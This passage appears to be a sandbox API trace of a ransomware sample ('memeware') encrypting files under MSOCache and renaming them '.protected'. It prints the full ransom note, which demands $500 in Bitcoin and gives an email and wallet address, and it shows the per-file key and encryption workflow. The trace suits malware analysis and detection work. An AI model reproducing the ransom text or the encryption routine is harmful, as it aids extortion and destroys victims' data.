Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0049.310] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0049.310] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0049.310] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0049.310] StrStrW (lpFirst="Setup.xml", lpSrch=".rar") returned 0x0 [0049.310] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0049.310] StrStrW (lpFirst="Setup.xml", lpSrch=".zip") returned 0x0 [0049.310] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x75e, lpOverlapped=0x0) returned 1 [0049.511] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffff8a2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0049.511] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x75e, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x75e, lpOverlapped=0x0) returned 1 [0049.511] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0049.511] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0049.511] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0049.511] CloseHandle (hObject=0xb4) returned 1 [0049.512] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.protected") returned 86 [0049.512] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.protected")) returned 1 [0049.513] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0049.513] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0049.513] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt") returned 84 [0049.513] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0049.513] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0049.513] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0049.514] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0049.514] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0049.514] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0049.514] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0049.514] CloseHandle (hObject=0xa4) returned 1 [0049.515] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0049.515] lstrcmpiW (lpString1="{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0049.515] lstrcmpiW (lpString1="{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="Program Files") returned -1 [0049.515] lstrcmpiW (lpString1="{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="Program Files (x86)") returned -1 [0049.515] lstrcmpiW (lpString1="{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0049.515] lstrcmpiW (lpString1="{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0049.515] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C") returned 66 [0049.515] lstrcmpW (lpString1="{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0049.515] lstrcmpW (lpString1="{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0049.515] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*") returned 68 [0049.515] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x447cc0 [0049.735] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0049.735] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0049.735] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0049.735] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0049.735] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0049.735] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\.") returned 68 [0049.735] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.735] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0049.735] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0049.735] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0049.735] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0049.735] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0049.735] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0049.735] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0049.735] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0049.735] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0049.735] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0049.735] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0049.735] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\..") returned 69 [0049.735] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0049.735] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.735] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0049.735] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0049.735] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0049.735] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0049.735] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0049.735] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0049.735] lstrcmpiW (lpString1="PublisherMUI.msi", lpString2="Windows") returned -1 [0049.735] lstrcmpiW (lpString1="PublisherMUI.msi", lpString2="Program Files") returned 1 [0049.736] lstrcmpiW (lpString1="PublisherMUI.msi", lpString2="Program Files (x86)") returned 1 [0049.736] lstrcmpiW (lpString1="PublisherMUI.msi", lpString2="$Recycle.bin") returned 1 [0049.736] lstrcmpiW (lpString1="PublisherMUI.msi", lpString2="System Volume Information") returned -1 [0049.736] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 83 [0049.736] StrStrIW (lpFirst="PublisherMUI.msi", lpSrch=".protected") returned 0x0 [0049.736] lstrcmpW (lpString1="PublisherMUI.msi", lpString2="RESTORE_FILES.txt") returned -1 [0049.736] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0049.736] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0049.736] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0049.736] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 83 [0049.736] StrStrW (lpFirst="PublisherMUI.msi", lpSrch=".txt") returned 0x0 [0049.736] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 83 [0049.736] StrStrW (lpFirst="PublisherMUI.msi", lpSrch=".rar") returned 0x0 [0049.736] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 83 [0049.736] StrStrW (lpFirst="PublisherMUI.msi", lpSrch=".zip") returned 0x0 [0049.737] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0049.817] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0049.817] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0049.817] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0049.817] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0049.826] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0049.826] CloseHandle (hObject=0xb4) returned 1 [0049.912] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.protected") returned 93 [0049.912] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.protected" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi.protected")) returned 1 [0049.912] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0049.912] lstrcmpiW (lpString1="PublisherMUI.xml", lpString2="Windows") returned -1 [0049.913] lstrcmpiW (lpString1="PublisherMUI.xml", lpString2="Program Files") returned 1 [0049.913] lstrcmpiW (lpString1="PublisherMUI.xml", lpString2="Program Files (x86)") returned 1 [0049.913] lstrcmpiW (lpString1="PublisherMUI.xml", lpString2="$Recycle.bin") returned 1 [0049.913] lstrcmpiW (lpString1="PublisherMUI.xml", lpString2="System Volume Information") returned -1 [0049.913] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 83 [0049.913] StrStrIW (lpFirst="PublisherMUI.xml", lpSrch=".protected") returned 0x0 [0049.913] lstrcmpW (lpString1="PublisherMUI.xml", lpString2="RESTORE_FILES.txt") returned -1 [0049.913] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0049.913] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0049.913] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0049.913] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 83 [0049.913] StrStrW (lpFirst="PublisherMUI.xml", lpSrch=".txt") returned 0x0 [0049.913] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 83 [0049.913] StrStrW (lpFirst="PublisherMUI.xml", lpSrch=".rar") returned 0x0 [0049.913] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 83 [0049.913] StrStrW (lpFirst="PublisherMUI.xml", lpSrch=".zip") returned 0x0 [0049.913] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x5aa, lpOverlapped=0x0) returned 1 [0050.018] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffa56, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0050.018] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x5aa, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x5aa, lpOverlapped=0x0) returned 1 [0050.018] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0050.018] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0050.018] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0050.018] CloseHandle (hObject=0xb4) returned 1 [0050.019] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.protected") returned 93 [0050.019] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.protected")) returned 1 [0050.019] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0050.019] lstrcmpiW (lpString1="PubLR.cab", lpString2="Windows") returned -1 [0050.019] lstrcmpiW (lpString1="PubLR.cab", lpString2="Program Files") returned 1 [0050.019] lstrcmpiW (lpString1="PubLR.cab", lpString2="Program Files (x86)") returned 1 [0050.020] lstrcmpiW (lpString1="PubLR.cab", lpString2="$Recycle.bin") returned 1 [0050.020] lstrcmpiW (lpString1="PubLR.cab", lpString2="System Volume Information") returned -1 [0050.020] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 76 [0050.020] StrStrIW (lpFirst="PubLR.cab", lpSrch=".protected") returned 0x0 [0050.020] lstrcmpW (lpString1="PubLR.cab", lpString2="RESTORE_FILES.txt") returned -1 [0050.020] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0050.020] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0050.020] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0050.020] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 76 [0050.020] StrStrW (lpFirst="PubLR.cab", lpSrch=".txt") returned 0x0 [0050.020] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 76 [0050.020] StrStrW (lpFirst="PubLR.cab", lpSrch=".rar") returned 0x0 [0050.020] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 76 [0050.020] StrStrW (lpFirst="PubLR.cab", lpSrch=".zip") returned 0x0 [0050.020] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0050.030] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0050.030] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0050.030] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0050.030] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0050.037] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0050.037] CloseHandle (hObject=0xb4) returned 1 [0050.361] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.protected") returned 86 [0050.361] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab.protected" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab.protected")) returned 1 [0050.362] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0050.362] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0050.362] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files") returned 1 [0050.362] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files (x86)") returned 1 [0050.362] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0050.362] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0050.362] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0050.362] StrStrIW (lpFirst="Setup.xml", lpSrch=".protected") returned 0x0 [0050.362] lstrcmpW (lpString1="Setup.xml", lpString2="RESTORE_FILES.txt") returned 1 [0050.362] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0050.362] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0050.362] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All 